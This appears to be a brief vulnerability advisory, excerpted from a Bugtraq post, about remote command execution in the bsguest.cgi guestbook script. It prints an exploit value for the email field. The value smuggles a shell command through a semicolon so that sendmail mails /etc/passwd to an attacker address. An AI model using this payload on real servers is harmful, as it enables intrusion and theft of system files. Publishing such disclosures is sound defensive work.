|
Brian Stanback bsguest.cgi Remote Command Execution Vulnerability
Excerpted from bugtraq post by <rivendell_team@yahoo.com> / Elf <whitehatjoe@hotmail.com> --- Attacker enters his email address as <whitehatjoe@hotmail.com> 'hacker@example.com;/usr/sbin/sendmail hacker@example.com < /etc/passwd', server mails a confirmation letter along with the passwd file to the attacker. --- |
|
|
Privacy Statement |
